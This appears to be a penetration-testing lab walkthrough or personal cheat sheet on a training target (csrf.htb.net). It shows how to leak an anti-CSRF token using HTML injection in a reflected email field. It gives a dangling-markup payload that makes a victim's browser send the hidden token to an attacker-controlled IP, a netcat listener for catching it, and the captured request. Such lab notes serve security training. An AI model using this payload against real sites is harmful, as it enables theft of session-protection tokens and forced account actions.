WITH ANTI-CSRF TOKEN (POST METHOD)
this attack is more practical than the "GET" version as it does not require the attacker to reside in the local network. however, the adversary may still need to bypass the login page IOT execute this method.
#compromise/access web pages
root@oco:~$ BROWSER > {targetSite:port}
...
* once the accessed, review the source code to identify any forms that could be used
#study the source code on the site
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
...
#click the buttons to identify functions that could be vulnerable
root@oco:~$ BROWSER > {targetSite:port/app} > {Delete}
Are you sure you want to delete your account?
Email:
julie.rogers@example.com
- the email address was reflected back to the user on the window and the url
- URL: http://csrf.htb.net/app/delete/julie.rogers@example.com
#test whether the reflected email address (URL & windows) is vulneable to injection
root@oco:~$ BROWSER > http://csrf.htb.net/app/delete/<h1>h1<u>underline<%2fu><%2fh1>
Are you sure you want to delete your account?
Email:
h1underline
* $2f is the URL encoding for /
* replace the email address with HTML to test an injection attack
#inspect the source code
root@oco:~$ BROWSER > {targetSite:port/app/delete/<h1>h1<u>underline<%2fu><%2fh1>} > CTRL + U
<div class="subtitle" style="color: black;">Email: <div style="color: gainsboro;"><h1>h1<u>underline</u></h1></div><input name="csrf" type="hidden" value="4b2de661052d7146b2724c09ffaa1c8e998d03e2" meta-dev='testdata'
* you should notice that the injection happens before a single quote
- this can abused to leak the CSRF-Token.#craft the payload
root@oco:~$ ifconfig
...
root@oco:~$ echo "<table%20background='%2f%2f{attackerIP:port}%2f"
<table%20background='%2f%2f{attackerIP:port}%2f
* %2f is the URL encoding for /
#serve the payload
root@oco:~$ nc -nlvp 8080
...#expected target trigger
#assumption and expectation
# - target must be logged-in and authenticated to the non-malicious web page
# - at the moment, target must specifically paste the malicious code into the URL
# - thinking of a way to embed the malicious URL, so the target can just click on the link (delete button), instead of pasting characters into the URL
root@target:~$ BROWSER > {website} > {profile}...<table%20background='%2f%2f{attackerIP:port}%2f
root@oco:~$ nc...
listening on [any] 8080 ...
connect to [10.10.14.32] from (UNKNOWN) [10.10.14.32] 38598
GET /%3C/div%3E%3Cinput%20name=%22csrf%22%20type=%22hidden%22%20value=%224b2de661052d7146b2724c09ffaa1c8e998d03e2%22%20meta-dev= HTTP/1.1
Host: 10.10.14.32:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://csrf.htb.net/
DNT: 1
Connection: keep-alive
Sec-GPC: 1
Priority: u=4, iLast updated